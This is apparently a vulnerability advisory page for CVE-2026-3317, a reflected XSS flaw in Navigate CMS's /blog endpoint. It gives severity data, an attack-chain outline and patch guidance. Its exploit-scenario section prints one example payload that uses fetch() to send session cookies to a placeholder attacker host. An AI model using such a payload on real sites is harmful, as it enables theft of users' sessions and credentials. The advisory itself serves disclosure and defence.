Skip to main content

Navigate Cms CVE-2026-3317

| EUVD-2026-24073 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-21 INCIBE GHSA-xh63-cv27-942f
XSS Navigate Cms
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

6
Analysis Generated
Apr 21, 2026 - 11:56 vuln.today
CVSS changed
Apr 21, 2026 - 10:22 NVD
5.1 (MEDIUM)
EUVD ID Assigned
Apr 21, 2026 - 09:45 euvd
EUVD-2026-24073
Analysis Generated
Apr 21, 2026 - 09:45 vuln.today
Patch released
Apr 21, 2026 - 09:45 nvd
Patch available
CVE Published
Apr 21, 2026 - 09:03 nvd
MEDIUM 5.1

DescriptionCVE.org

Reflected Cross-Site Scripting (XSS) vulnerability in Navigate Content Management System. The vulnerability is present in the '/blog' endpoint because user input is not properly sanitized through designed query parameters. This results in unsafe HTML rendering, which could allow a remote attacker to execute JavaScript code in the victim's browser.

AnalysisAI

Reflected cross-site scripting in Navigate CMS allows remote attackers to inject and execute arbitrary JavaScript in victims' browsers via unsanitized query parameters in the /blog endpoint. The vulnerability affects Navigate CMS versions 0 through 2.9.5 and requires user interaction (clicking a malicious link). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker crafts malicious URL with XSS payload
Delivery
Attacker delivers link via phishing email
Exploit
Victim clicks link in browser
Execution
Navigate CMS /blog endpoint echoes unsanitized query parameter
Persist
Browser renders and executes injected JavaScript
Impact
Attacker steals session cookies or credentials
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The vulnerability is exploitable via reflected XSS only when Navigate CMS /blog endpoint receives unsanitized query parameters that are rendered in HTML responses without encoding. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This reflected XSS presents moderate real-world risk aligned with its CVSS 5.1 score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL containing JavaScript payload in a query parameter of the /blog endpoint (e.g., 'https://vulnerable-cms.com/blog?q=<script>fetch(attacker.com/steal?cookie='+document.cookie)</script>') and distributes it via phishing email or social media. When a victim clicks the link while logged into Navigate CMS, the JavaScript executes in their browser, exfiltrating session cookies or authentication tokens to the attacker's server. …
Remediation Upgrade Navigate CMS to version 2.9.6 or later to obtain the vendor-released patch. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-3317 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy